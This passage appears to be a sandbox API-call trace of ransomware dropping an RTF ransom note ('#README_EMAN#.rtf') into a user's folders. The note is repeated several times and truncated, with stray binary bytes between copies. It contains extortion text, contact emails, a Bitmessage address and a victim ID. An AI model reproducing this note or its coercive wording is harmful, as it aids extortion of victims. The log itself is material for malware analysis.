middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n£\x94\x12ç]z9úW­Á\x7fvß\x84ôΧÐùæËH3\n", lpUsedDefaultChar=0x0) returned 8717 [0278.527] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.528] CloseHandle (hObject=0x2c8) returned 1 [0278.528] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0278.528] GetLastError () returned 0x2 [0278.528] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail 